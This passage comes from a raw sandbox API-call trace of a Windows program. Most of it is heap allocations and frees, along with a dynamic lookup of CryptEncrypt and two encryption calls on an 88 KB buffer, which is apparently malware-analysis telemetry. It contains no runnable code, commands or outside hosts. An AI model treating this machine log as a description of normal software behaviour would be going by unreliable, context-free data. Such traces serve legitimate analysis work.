hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa430, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.319] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3c18 [0164.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0164.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0164.320] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x159aa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x159b0) returned 1 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0164.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.324] CharLowerBuffW (in: lpsz="byte[88496]", cchLength=0xb | out: lpsz="byte[88496]") returned 0xb [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.325] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.325] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.325] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0164.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.326] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34dd5c0*, pdwDataLen=0x8bef68*=0x159aa, dwBufLen=0x159b0 | out: pbData=0x34dd5c0*, pdwDataLen=0x8bef68*=0x159b0) returned 1 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0164.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) 